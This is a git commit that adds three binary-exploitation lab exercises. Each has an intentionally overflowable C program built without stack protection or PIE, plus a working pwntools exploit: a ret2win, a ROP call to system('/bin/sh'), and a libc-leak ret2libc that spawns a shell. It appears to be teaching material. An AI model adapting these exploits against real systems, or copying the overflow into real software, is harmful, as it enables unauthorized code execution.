Add code-reuse pwn-based exploits

razvand · Nov 18, 2019 · 5087a24 · 5087a24
1 parent 3debd84
commit 5087a24
Show file tree

Hide file tree

Showing 12 changed files with 198 additions and 0 deletions.
diff --git a/code-reuse/system-and-sh-present/.gitignore b/code-reuse/system-and-sh-present/.gitignore
@@ -0,0 +1 @@
+/vuln
diff --git a/code-reuse/system-and-sh-present/Makefile b/code-reuse/system-and-sh-present/Makefile
@@ -0,0 +1,15 @@
+CFLAGS = -Wall -g -fno-PIC -Wno-unused-function -fno-stack-protector
+LDFLAGS = -no-pie
+
+.PHONY: all clean
+
+all: vuln
+
+vuln: vuln.o
+
+vuln.o: vuln.c
+
+clean:
+	-rm -f vuln vuln.o
+	-rm -f *~
+	-rm -f peda-session-* core
diff --git a/code-reuse/system-and-sh-present/exploit.py b/code-reuse/system-and-sh-present/exploit.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env python2
+
+import sys
+from pwn import *
+
+e = ELF("vuln")
+#hidden_address = e.symbols["hidden"]
+system_plt_address = e.plt["system"] + 4 # XXX
+sh_address = e.symbols["sh"]
+pop_rdi_ret = 0x400623
+print "plt_address: 0x{:016x}".format(system_plt_address)
+print "sh: 0x{:016x}".format(sh_address)
+
+offset = 40
+payload = offset * "A" + p64(pop_rdi_ret) + p64(sh_address) + p64(system_plt_address)
+print "".join("\\x{:02x}".format(ord(i)) for i in payload)
+
+io = process("./vuln")
+#gdb.attach(io)
+io.sendline(payload)
+io.interactive()
diff --git a/code-reuse/system-and-sh-present/vuln.c b/code-reuse/system-and-sh-present/vuln.c
@@ -0,0 +1,22 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+static const char sh[] = "/bin/sh";
+
+static void hidden(void)
+{
+	system("ls");
+}
+
+static void reader(void)
+{
+	char buffer[32];
+
+	fgets(buffer, 128, stdin);
+}
+
+int main(void)
+{
+	reader();
+	return 0;
+}
diff --git a/code-reuse/system-only-present/.gitignore b/code-reuse/system-only-present/.gitignore
@@ -0,0 +1 @@
+/vuln
diff --git a/code-reuse/system-only-present/Makefile b/code-reuse/system-only-present/Makefile
@@ -0,0 +1,15 @@
+CFLAGS = -Wall -g -fno-PIC -Wno-unused-function -fno-stack-protector
+LDFLAGS = -no-pie
+
+.PHONY: all clean
+
+all: vuln
+
+vuln: vuln.o
+
+vuln.o: vuln.c
+
+clean:
+	-rm -f vuln vuln.o
+	-rm -f *~
+	-rm -f peda-session-* core
diff --git a/code-reuse/system-only-present/exploit.py b/code-reuse/system-only-present/exploit.py
@@ -0,0 +1,49 @@
+#!/usr/bin/env python2
+
+import sys
+from pwn import *
+import struct
+
+context.log_level = "debug"
+
+e = ELF("vuln")
+main_address = e.symbols["main"]
+puts_plt_address = e.plt["puts"]
+puts_got_address = e.got["puts"]
+pop_rdi_ret = 0x400673
+log.info("puts_plt_address: 0x{:016x}".format(puts_plt_address))
+log.info("puts_got_address: 0x{:016x}".format(puts_got_address))
+
+# 1st stage payload
+offset = 40
+payload = offset * "A" + p64(pop_rdi_ret) + p64(puts_got_address) + p64(puts_plt_address) + p64(main_address)
+log.info("".join("\\x{:02x}".format(ord(i)) for i in payload))
+
+io = process("./vuln")
+#gdb.attach(io)
+io.sendline(payload)
+io.recvline()
+msg = io.recvline()
+msg = msg.strip()
+msg = msg + (8-len(msg)) * "\x00"
+puts_address_in_libc = struct.unpack("<Q", msg)[0]
+log.info("puts_address_in_libc: 0x{:016x}".format(puts_address_in_libc))
+
+libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
+puts_offset_in_libc = libc.symbols["puts"]
+log.info("puts_offset_in_libc: 0x{:016x}".format(puts_offset_in_libc))
+
+libc_base_address = puts_address_in_libc - puts_offset_in_libc
+libc.address = libc_base_address
+log.info("libc_base_address: 0x{:016x}".format(libc.address))
+system_address_in_libc = libc.symbols["system"]
+log.info("system_address_in_libc: 0x{:016x}".format(system_address_in_libc))
+
+sh_address_in_libc = next(libc.search("/bin/sh\x00"))
+log.info("sh_address_in_libc: 0x{:016x}".format(sh_address_in_libc))
+
+payload = offset * "A" + p64(pop_rdi_ret) + p64(sh_address_in_libc) + p64(system_address_in_libc)
+gdb.attach(io)
+io.sendline(payload)
+
+io.interactive()
diff --git a/code-reuse/system-only-present/vuln.c b/code-reuse/system-only-present/vuln.c
@@ -0,0 +1,21 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+static void hidden(void)
+{
+	system("ls");
+}
+
+static void reader(void)
+{
+	char buffer[32];
+
+	fgets(buffer, 128, stdin);
+}
+
+int main(void)
+{
+	puts("Hello");
+	reader();
+	return 0;
+}
diff --git a/code-reuse/system-sh-present/.gitignore b/code-reuse/system-sh-present/.gitignore
@@ -0,0 +1 @@
+/vuln
diff --git a/code-reuse/system-sh-present/Makefile b/code-reuse/system-sh-present/Makefile
@@ -0,0 +1,15 @@
+CFLAGS = -Wall -g -fno-PIC -Wno-unused-function -fno-stack-protector
+LDFLAGS = -no-pie
+
+.PHONY: all clean
+
+all: vuln
+
+vuln: vuln.o
+
+vuln.o: vuln.c
+
+clean:
+	-rm -f vuln vuln.o
+	-rm -f *~
+	-rm -f peda-session-* core
diff --git a/code-reuse/system-sh-present/exploit.py b/code-reuse/system-sh-present/exploit.py
@@ -0,0 +1,17 @@
+#!/usr/bin/env python2
+
+from pwn import *
+
+e = ELF("vuln")
+#hidden_address = e.symbols["hidden"]
+hidden_address = 0x40057b
+print "hidden: 0x{:016x}".format(hidden_address)
+
+offset = 40
+payload = offset * "A" + p64(hidden_address)
+print "".join("\\x{:02x}".format(ord(i)) for i in payload)
+
+io = process("./vuln")
+#gdb.attach(io)
+io.sendline(payload)
+io.interactive()
diff --git a/code-reuse/system-sh-present/vuln.c b/code-reuse/system-sh-present/vuln.c
@@ -0,0 +1,20 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+static void hidden(void)
+{
+	system("/bin/sh");
+}
+
+static void reader(void)
+{
+	char buffer[32];
+
+	fgets(buffer, 128, stdin);
+}
+
+int main(void)
+{
+	reader();
+	return 0;
+}